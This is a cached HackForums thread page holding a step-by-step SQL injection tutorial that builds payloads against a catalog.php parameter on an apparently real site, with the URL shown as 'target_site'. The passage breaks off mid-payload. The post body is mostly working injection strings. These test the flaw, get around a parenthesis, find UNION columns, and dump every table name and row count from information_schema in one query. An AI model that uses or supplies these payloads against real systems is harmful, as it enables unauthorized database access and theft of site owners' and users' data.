<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3785325" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3785325" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3785325</a>. It is a snapshot of the page as it appeared on 25 Mar 2014 01:45:42 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3785325" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:KBNYHgmJqi8J:www.hackforums.net/showthread.php%3Ftid%3D3785325&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] playing with SQLi output data - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] playing with SQLi output data"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3785325"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-24-2014, 05:45 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] playing with SQLi output data</span> </div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3785325" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/rating.js"></script><div id="success_rating_3785325" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3785325"><li style="width: 0%" class="current_rating" id="current_rating_3785325">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3785325&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3785325&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3785325&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3785325&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3785325&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3785325" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3785325_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3785325" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3785325&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3785325");
// -->
</script><div><strong>[SQLi tutorial] playing with SQLi output data</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid35512960" id="pid35512960"></a><table class="tborder" style="border-top-width: 0; " id="post_35512960" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-03-2013, 12:04 PM <span id="edited_by_35512960"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35512960#pid35512960">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,164<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35512960">We
 all know SQLi is primary used to fetch some data. So formatting of data
 is not so important. But you will agree with me it is much more 
readable if we get data in such way as in <a href="http://www.hackforums.net/showthread.php?tid=3683301" target="_blank"><span style="text-decoration: underline;">challenge 60</span></a>. Because all we need are some additional functions and some logic.<br><br><img title="[Image: a5907a0a81b00629559e2e256f087426.jpg] ... Shift+R improves the quality of this image. Shift+A improves the quality of all images on this page." src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/a5907a0a81b00629559e2e256f087426.jpg" alt="" border="0"><br><br><span style="color: #FFD700;">So this tutorial is not aimed to teach you how to inject, but how to manipulate data you get. </span>It is related to <a href="http://www.hackforums.net/showthread.php?tid=3773788" target="_blank"><span style="text-decoration: underline;">challenge 69</span></a>. If you want to use code from this tutorial <span style="color: #00BFFF;">use target link from that challenge</span>. Code examples in this tutorial will be without site URL (reason: uncle Google) <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/lipssealed.gif" style="vertical-align: middle;" alt="Lipssealed" title="Lipssealed" border="0"><br><br>Task in <a href="http://www.hackforums.net/showthread.php?tid=3773788" target="_blank"><span style="text-decoration: underline;">challenge 69</span></a>
 was displaying data in two columns: table names (left aligned) and 
records count for each table (right aligned). All tables with more than 
10 records should be displayed. Result should look like:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/745001a271950b265838a8256097c843.jpg" alt="[Image: 745001a271950b265838a8256097c843.jpg]" border="0"><br><br>Let's start our injection with test for SQLi vulnerability with adding <span style="color: #32CD32;"><span style="font-weight: bold;">'</span></span> after <span style="color: #FFD700;">brend</span> parameter.<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #FF99FF">'&nbsp;<br></span></code></div></div></div><br>No error response, but site content changed (some text and pictures are missing) as indication of SQLi vulnerability.<br><br>Let's continue our injection as usually with finding records count.<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180&nbsp;order&nbsp;by&nbsp;1</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><span style="color: #32CD32;">result:</span> site content changed like at testing for SQLi vulnerability. Obviously that will be site response on errors.<br><br>Integer based doesn't work, let's try with string based SQLi:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #FF99FF">'&nbsp;order&nbsp;by&nbsp;1--&nbsp;-&nbsp;<br></span></code></div></div></div><span style="color: #32CD32;">Result:</span> same as before. Error response (web content was changed - some text is missing)<br><br>Integer based and also string based SQLi doesn't work. <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"> Obviously there is something else preventing us to get information about columns count. It could be parentheses, WAF, <span style="color: #FFD700;">order by</span> / <span style="color: #FFD700;">group by</span> don't work at all etc.<br><br>Let's try with parentheses with adding <span style="font-weight: bold;"><span style="color: #FFD700;">)</span></span> after <span style="color: #FFD700;">brend</span> parameter:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">order&nbsp;by&nbsp;1</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><span style="color: #32CD32;">result:</span> it works <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> No need for searching proper antiWAF syntax... It wasn't WAF problem.<br><br>From here is easy to find proper columns count:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">9</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>and we see two vulnerable columns <span style="color: #00BFFF;"><span style="font-weight: bold;">2</span></span> and <span style="color: #00BFFF;"><span style="font-weight: bold;">9</span></span>:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/585e66f068e57b45c009ef767b599e9b.jpg" alt="[Image: 585e66f068e57b45c009ef767b599e9b.jpg]" border="0"><br><br>Our final command for <a href="http://www.hackforums.net/showthread.php?tid=3773788" target="_blank"><span style="text-decoration: underline;">challenge 69</span></a> will be complex. That is why we will build it <span style="color: #32CD32;"><span style="font-weight: bold;">in steps</span></span>:<br><br><br><span style="font-size: large;"><span style="color: #FFA500;"><span style="font-weight: bold;">Step #1</span></span></span><br><br>Let's display all tables in primary database. We could use group_concat() for that. But as it has <span style="color: #FF6347;">1024 characters limit</span> and our final result will be long, we will choose <span style="color: #FFD700;"><span style="font-weight: bold;">dump in one shot</span></span> syntax. I wrote tutorials about it: <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">part #1</span></a>, <a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank"><span style="text-decoration: underline;">part #2</span></a> and <a href="http://www.hackforums.net/showthread.php?tid=3567217" target="_blank"><span style="text-decoration: underline;">part #3</span></a>.<br><br>This will give us all tables in primary database:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>We see 13 tables from primary database:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/fa15b1105bbe369b7a8f27e35c7abb65.jpg" alt="[Image: fa15b1105bbe369b7a8f27e35c7abb65.jpg]" border="0"><br><br><br><span style="font-size: large;"><span style="color: #FFA500;"><span style="font-weight: bold;">Step #2</span></span></span><br>Let's add condition <span style="color: #FFD700;">table should have more than 10 records</span> to be included in output. We will use function <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #00BFFF;">if()</span></span></span>. See my tutorial <a href="http://www.hackforums.net/showthread.php?tid=3588441" target="_blank"><span style="text-decoration: underline;">Using Flow Control functions/statements in SQLi</span></a> for more info. It's syntax is:<br><br>if(<span style="color: #FFD700;">some_condition</span>, <span style="color: #32CD32;">return_if_some_condition_is_true</span>, <span style="color: #FF4500;">return_if_some_condition_is_false</span>)<br><br>Our if statement will be:<br><br>if( <span style="color: #FFD700;">table_rows&gt;10</span>, <span style="color: #32CD32;">concat(0x3c62723e, table_name, table_rows)</span>, <span style="color: #FF4500;">0x00</span>)<br><br>If table has more than 10 record display <span style="color: #32CD32;">&lt;br&gt;</span> (in hex) for new line, <span style="color: #32CD32;">table_name</span> and it's <span style="color: #32CD32;">records count</span>. Otherwise display <span style="color: #FF4500;">nothing (0x00)</span>.<br><br>After we execute our command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,<br>if(&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">&gt;</span><span style="color: #66CCFF">10</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)<br>))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>we get list with only 8 tables:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/69cbd984be92c34a1631b6df4ef0167f.jpg" alt="[Image: 69cbd984be92c34a1631b6df4ef0167f.jpg]" border="0"><br><br>Table
 name (where more than 10 records exists) with its records count are 
showed without any separator. We will correct that in our next step.<br><br><br><span style="font-size: large;"><span style="color: #FFA500;"><span style="font-weight: bold;">Step #3</span></span></span><br><br>Tables
 should be left aligned (they are already). But if we want to add right 
aligned records count later we must first make all table names same 
width. To each table name (with same width) we will simply add next 
block of text with right aligned table record numbers (step 5).<br><br>We will use function <span style="color: #00BFFF;"><span style="font-size: medium;"><span style="font-weight: bold;">repeat()</span></span></span> for making same height of all tables names.<br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #00BFFF;">Repeat()</span></span></span><br><br>REPEAT(<span style="color: #FFD700;">str</span>, <span style="color: #32CD32;">count</span>) returns a string consisting of the string <span style="color: #FFD700;">str </span>repeated <span style="color: #32CD32;">count </span>times.<br><br>We
 should first choose height we want. Let's choose 15 characters. If we 
except table names with more characters, than that number should be 
higher. Our command will be:<br><br><span style="color: #FFA500;">repeat( 0x266e6273703b, 15-length(table_name) )</span><br><br><span style="color: #32CD32;">0x266e6273703b</span> is <span style="color: #FFD700;">&amp;nbsp;</span> --&gt; code for <span style="color: #00BFFF;">hard space</span>
 (or non breaking space) in HTML. Command returns number of repeated 
hard spaces missing to total length of 15 characters, based on length of
 each table name. If table name has 15 characters it will return 0 hard 
spaces. If table name length is 10 it will return 5 hard spaces.<br><br>We will add that part of hard spaces after each table name:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: 